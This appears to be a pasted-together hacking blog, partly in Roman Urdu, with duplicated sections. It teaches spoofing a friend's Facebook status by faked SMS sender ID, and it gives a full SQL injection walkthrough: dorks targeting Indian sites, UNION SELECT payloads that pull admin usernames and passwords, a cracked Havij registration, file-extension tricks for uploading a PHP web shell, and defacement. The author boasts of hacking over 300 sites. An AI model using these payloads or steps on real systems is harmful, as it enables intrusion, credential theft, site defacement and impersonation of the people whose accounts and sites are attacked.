1. Go to SMSGlobal.com and register for an account.
2. After logging in to your account, click on “Send SMS to a Number”

3. Enter the information as follows:
Send SMS To: 919232232665
Sender ID From: The registered mobile number of your friend.
Message: The status you want to update for your friend. Enter anything you want. It will appear as your friend’s new status.
Hit on Send SMS.
4. Now, Facebook will update your friend’s status to the message you have sent.
Most of us know that Facebook allows us to update our status using our mobile phone. This feature is called Facebook Text. If you have Facebook Text enabled, you have to just type in the status and send this message to “923223265? using your registered mobile phone. Facebook will automatically update your status.

IMPORTANT!! : The slave MUST have the Facebook Text feature enabled in their account , if they don't then this will not work
So, in this Facebook hack, we will use SMSGlobal to change the status of your friend. SMSGlobal allows us to send message to any number from anyone’s number. That is, we will send Facebook a fake SMS from your friend’s registered mobile number.
Facebook will think that the message has been sent by your friend and his status will be updated according to the message contents sent by us.
1. Go to SMSGlobal.com and register for an account.
2. After logging in to your account, click on “Send SMS to a Number”
3. Enter the information as follows:
Send SMS To: 919232232665
Sender ID From: The registered mobile number of your friend.
Message: The status you want to update for your friend. Enter anything you want. It will appear as your friend’s new status.
Hit on Send SMS.
4. Now, Facebook will update your friend’s status to the message you have sent.
Ab Ap Bhi Websites Hack karoo SQl INJECTION Ke Sath :)
This Post Is Written adeel abbasi.Thanks To Him
SQL InjecTion In urdU Language Sab Se Pehele Aap download KAren!
[+] FireFox!
[+] HackBar
[+] havij for finding Admin Panel
[+] 1 or 2 Vulnerable Webs Tongue
[+][+][+][+][+][+]^^^^^^^^^^^^^^^^^^^[+][+][+][+][+][+][+]
<-= S T A R T =->
Ye Search engine Kholen!
Or Search Karen!
Special Dorks!
inurl:index.php?id=
inurlages.php?id=
inurl:images.php?id=
India Ki Vulnerable websites KEse Dhoonden?????
Apna Dork google Per Likhen
Or site:.in Aakhir Main Likhden
Example:-) inurl:images.php?id= site:.in
Ok Ab TayyAr hoajyen :*
hamain Kya Dhoondna hai???
Vulnerable web
Tables
Column
Admin PAnel And shell UPloading
Defacing Tongue
Ok To Ye Hai ApnI VulneRable Web!
Kese check KAren ye Site vulnerable hai?? bus ‘ Ye Vuln web K End Main Lagayen!
Example:-)
http://www.vuln.in/index.php?id=15′ Aise
http://www.vuln.in/index.php?id=15 Order by 1
Simple page
http://www.vuln.in/index.php?id=15 Order by 2
Simple Page
http://www.vuln.in/index.php?id=15 Order by 3
Simeple page
http://www.vuln.in/index.php?id=15 Order by 4
Simple Page
http://www.vuln.in/index.php?id=15 Order by 5
Simple Page
http://www.vuln.in/index.php?id=15 Order by 6
1 errorr Aagaya Unknown Column in order To Clause “6″
Iska Matlb http://www.vuln.in/index.php?id=15 Per Sirf 5 hi Columns hain
Ab Union Select Waala Method Start
union Find Karne Se Pehele Vuln Web Ki Value Per – Lagaden !
Example
http://www.vuln.in/index.php?id=-15 Aise
Or Ab Vulnerable column Find KAren!
http://www.vuln.in/index.php?id=-15 Union Select 1,2,3,4,5 vuln web per sirf 5 Columns the!
Phir Kuch Numbers Screen Per Aajeynge Jese 2 3 etc….!
Jo Sub Se Zyada Dark Or Bold Ho Wo Sab Se Zyada Vulnerable hai!
Sochen 2 Sab Se Zyada Dark Or Bold hai!
Ab Tables Found KArne Waal Method Start
Table Found KArne K Liye Sab Se Zyada Dark Or Bold Number “2″ Ko Hatake !
ye Likhen group_concat(table_name) or Phir Aakhir main from information_schema.tables where table_schema=database ()–
Example:-)
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(table_name),3,4,5 from information_schema.tables where
table_schema= database ()–
Aise Likhna Hai 2 Ki Jaga Per
So ye hamain Table DedeGa magar Dihaan rahe Sab Kuch Theek Likeyega warna My_sql Fetch error Aajayega!
Like:-) admin,user,post,contacts,timing,gallery, etc etc…!
hamain chahiye Admin Table ! Ab Apna hackBar kholeye Jo k 1 FireFox Addon hai!
Or wahan MySql Likha Hai Wahan Ja Kar CHAR Menu Kholen Or Likhen “Admin”!
Or Wo Kuch Is Tarha Char Dega CHAR(12,13,14,21,43,235,2365,21,) Ye Real nahi hai!
Ok!
ab Aapko group_concat(table_name0 Ki Jagah group_concat(column_name) Likhna hOgA Tongue
Or form Information_schema.tables Ki Jagah column Likhna hai Or table_schema= Ki Jagah per table_name Likhna hai Tongue
Example:-) http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where
table_name= ChaR (1,2,13,1,3,2142,354,234,)
Ab Column FindinG <Method>
Ab aapko Apni vulnerable Web k aage Ye Karna hai Jo neeche hai
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where
table_name= ChaR (1,2,13,1,3,2142,354,234,)
Done
to Phir Ye aapko Kuch Istarha Dega
logs,username,password,date etc etc hamain username and Password Chahiye!
ab Passwor dKese nikaalen??? Neeche hai sab Kuch
http://www.vuln.in/index.php?id=-15 1,group_concat(username,0x3a,Password) from admin
Or Pass Aapka
90% Times Pass Encrypted Hota Hai Like MD5,MD2,SHa=1 etc etc!
To Isse Decrypt Karna Parta hai ! Maine 300 se zyada Web Hack Ki Lekin Decrypted Pass Or Admin panel nahi mila hahahaha!
Ok Ab Apna havij Open KAren Or usmain Apni vuln Link daalen Aise !
http://www.vuln.in/
Sirf Address Daalen Phir Find Admin Per CLick KAren!
http://www.vuln.in/admin
http://www.vuln.in/administrator
http://www.vuln.in/controlpanel
http://www.vuln.in/kpanel etc etc!
Ab http://www.vuln.in/admin Open KAren!
Or username And Pass Daalen!
Or aB Aap Web main hain Tongue
ab Ager chahen To Shell UPload KAr Sakte hain !
Ager Apne Logs Clear Karna Chahte hain To KArna Parega xD
Phir Uploading Option dhoonden !
Gallery Main images upload Is Best for uploading Shell :X
Ab Aap Apna Shell uPload KAren or deface Karden Tongu
admin panel hacking uploading shell and deface
HELLO I AM ADEEL ABBASI FROM AZAD KASHMIR( VILLEGE )GORHI.
Now a days my friends asking how to crack C panel and how to upload a
shell to site and rooting of server on i am explaining with my pals
first you need to hack cpanel via MySQL injection i have a great tool of MySQL injection is havij
i write detail of havij and how it register
Instructions
1.Run Havij.exe
2. Once it opens you will see register..
3. Click Register
Make sure you are connected to the internet
4. Under Name:
You write: Cracked@By.Exidous
5. Under File:
You select the folder where you are currently running the Havij program from and select Havij Key
6. Done....
Download :
Mediafire
Or
4shared
Or
ziddu
Steps To Register : (Screen Shots)
:
Now click in the "Analyze"
Then
It shows some messages there....Be alert on it and be show patience for
sometime to find it's vulernable and type of injection and if db server
is mysql and it will find database name.Then after get it's database is
name like xxxx_xxxx


In that Just put mark username and password and click "Get data"



now you get the admin panel
now time to upload the shell in the site
first you need to hack cpanel via MySQL injection i have a great tool of MySQL injection is havij
i write detail of havij and how it register
Free Download : Havij 1.15 pro Final
Instructions
1.Run Havij.exe
2. Once it opens you will see register..
3. Click Register
Make sure you are connected to the internet
4. Under Name:
You write: Cracked@By.Exidous
5. Under File:
You select the folder where you are currently running the Havij program from and select Havij Key
6. Done....
Download :
Mediafire
Or
4shared
Or
ziddu
Steps To Register : (Screen Shots)
:
First Find a sqli infected site .Now here i found a vulernable site
Now Let's start
Open havij and copy and paste infected link as shown in figure
Now click in the "Analyze"
Then
It shows some messages there....Be alert on it and be show patience for
sometime to find it's vulernable and type of injection and if db server
is mysql and it will find database name.Then after get it's database is
name like xxxx_xxxx
Then Move to another operation to find tables by clicking "tables" as
figure shown.Now click "Get tables" Then wait some time if needed

After founded the tables ,you can see there will be "users" Put mark
on it and click in the " get columns " tab as shown in figure
In that Just put mark username and password and click "Get data"
Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...


now you get the admin panelnow time to upload the shell in the site
How to Excute/Acess your .jpg Shell
find any uploading option in website. Sometimes the website will block .php extension
so you have to upload it in .jpg format.
First open your shell with notepad and then Save As and change the extension to one of these
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
If you did not find any option for uploading files, but have place where you can add news or new event or something you can use meta http-equiv to make redirection from website to your deface page. Just add this code in
after Getting admin Panel,if you can't upload .php directly upload it with modified extensions as I stated above.
After uploading, find the directoey where your fle uploaded,
example if you uploaded it in images then it will be in http://website/images/shell.php
Sometimes simple extension hiding will not work so you have to use one addon for firefox Live HTTP Headers,
Install it and then hide shell extension, go to the upload section. Open Live HTTP Headersand upload shell. Now if you try to go to the link where you have your shell uploaded it will give you error (only on some websites) so we will have to change that hided .php.jpgextension into the .php. So as we uploaded the shell and opened the Live HTTP Headersyou should find where you have uploaded your shell. You will have to find the line where ti writes that you uploaded the shell. Select it and then click on button reply.
After that you have to find once again the same line of code which shows that you have uploaded shell.
So when you find it select the extension you used to hide original .php. In my case it is .jpg (List of all these extension is given in this tutorial at the beginning). When you select it delete it so that we have only c100.php. And after that once again click on reply.
It will take you to the shell, and if it does not then you will have to find manually where shell has been uploaded and go to that link.
Note : This doesn't work for every website but working in mostly websites
First open your shell with notepad and then Save As and change the extension to one of these
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
If you did not find any option for uploading files, but have place where you can add news or new event or something you can use meta http-equiv to make redirection from website to your deface page. Just add this code in
after Getting admin Panel,if you can't upload .php directly upload it with modified extensions as I stated above.
After uploading, find the directoey where your fle uploaded,
example if you uploaded it in images then it will be in http://website/images/shell.php
Sometimes simple extension hiding will not work so you have to use one addon for firefox Live HTTP Headers,
Install it and then hide shell extension, go to the upload section. Open Live HTTP Headersand upload shell. Now if you try to go to the link where you have your shell uploaded it will give you error (only on some websites) so we will have to change that hided .php.jpgextension into the .php. So as we uploaded the shell and opened the Live HTTP Headersyou should find where you have uploaded your shell. You will have to find the line where ti writes that you uploaded the shell. Select it and then click on button reply.
After that you have to find once again the same line of code which shows that you have uploaded shell.
So when you find it select the extension you used to hide original .php. In my case it is .jpg (List of all these extension is given in this tutorial at the beginning). When you select it delete it so that we have only c100.php. And after that once again click on reply.
It will take you to the shell, and if it does not then you will have to find manually where shell has been uploaded and go to that link.
Note : This doesn't work for every website but working in mostly websites
Subscribe to:
Comments (Atom)